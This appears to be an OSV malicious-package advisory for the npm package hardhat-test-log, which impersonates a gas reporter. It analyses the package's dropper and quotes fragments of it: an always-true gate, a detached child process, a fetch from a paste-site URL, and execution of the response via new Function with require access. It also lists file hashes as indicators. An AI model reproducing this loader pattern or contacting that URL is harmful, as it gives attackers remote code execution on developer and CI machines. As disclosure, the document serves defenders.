MAL-2026-6369

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/hardhat-test-log/MAL-2026-6369.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6369
Published
2026-06-24T04:13:05Z
Modified
2026-06-29T07:16:44.484585522Z
Summary
Malicious code in hardhat-test-log (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (741350b4472a82c53151793b413166a5fad36af3d2d14fa1d12afba9eccb9fed)

Package impersonates the well-known eth-gas-reporter / hardhat-gas-reporter packages: README is titled 'eth-test-log', copies badges and contributor metadata, and package.json sets author to 'cgewecke' (the real maintainer of those projects). The advertised Mocha reporter entrypoint is a decoy. index.js exports log as the reporter, but the function contains var opt = 1; if (!opt) {...legitimate reporter code... } else { gestest(); } — the dead-code gate guarantees the else branch always runs, calling utils.connectNet. utils.connectNet (lib/utils.js) spawns node lib/syncResolve.js as a detached, unref'd child with stdio ignored, so the dropper persists beyond Mocha teardown and produces no CI output. lib/syncResolve.js then performs axios.get('https://www.jsonkeeper.com/b/KBZVB', { headers: { 'x-secret-key':... } }), extracts the Cookie field from the response, and executes it in-process via new Function.constructor('require', result)(require) — giving attacker-controlled code full Node require access. The fetch destination is a public paste-style host with mutable, opaque content and no integrity check, so the operator can rotate the payload at will. Installing/using this package as a Hardhat/Mocha gas reporter triggers remote code execution on the developer's or CI machine.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "1.1.0"
            ],
            "sha256": "c8eaf29821b0a2792ecc08837bdd52a09bee062279d6c8c83f5f15855b1098f6",
            "source": "amazon-inspector",
            "modified_time": "2026-06-24T04:13:05Z",
            "import_time": "2026-06-24T04:54:34.025624165Z",
            "id": "IN-MAL-2026-007420"
        },
        {
            "versions": [
                "1.1.2"
            ],
            "sha256": "741350b4472a82c53151793b413166a5fad36af3d2d14fa1d12afba9eccb9fed",
            "ranges": [
                {
                    "events": [
                        {
                            "introduced": "0"
                        }
                    ],
                    "type": "SEMVER"
                }
            ],
            "modified_time": "2026-06-29T06:04:48Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-007763",
            "import_time": "2026-06-29T07:09:10.865962004Z"
        }
    ]
}
References
Credits

Affected packages

npm / hardhat-test-log

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected

Affected versions

1.*
1.1.0
1.1.2

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "hardhat-test-log-1.1.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-YLkLCn9I3nIVSFFgBoXj4LMJl9WCwc5K0uTiRvo4Y2z03fYwWmIGF7hyC9ypZvdeE0yFzFiGs8frLzqSi+jLMA==",
                "sha1": "b4ce708860e4f50e9de722399683656770515e36"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "44002399a2427b6245b7aba983e270b3dade9e1c7e0d669807dfaaa78cb3ebbc",
            "path": "lib/syncResolve.js",
            "tlsh": "14017b9e3469e02c0eb012e9af175032f6126f27310ba1e9769d9b521f7ac695502eec"
        },
        {
            "sha256": "36c4c472f4d5f3409e527ffb69b413a6ef81c853ed6a4b82bc1ac32d19dbf371",
            "path": "lib/utils.js",
            "tlsh": "250231961cf760d3112a35e8aa1b6011e568b65b3208daf5bead53443f0633cd0e7ae9"
        },
        {
            "sha256": "db6f048ab50bdad5c12883185a63f731a1ff1f9d98055ea63e34e9d28137415f",
            "path": "index.js",
            "tlsh": "b3f1fe322eb7153745e3faac9bcba061d12696372201cfad7a8c93104f5447894efbe4"
        },
        {
            "sha256": "0ae78997fb4e33b7f2a18353ddeda8f65e274e766310e6dfe803cd91fb8bf26b",
            "path": "README.md",
            "tlsh": "b362e8f33e0a4a620f7be7c4550db5a4ff2a915cd6976a95b4ae834c23062b241ef190"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/hardhat-test-log/MAL-2026-6369.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]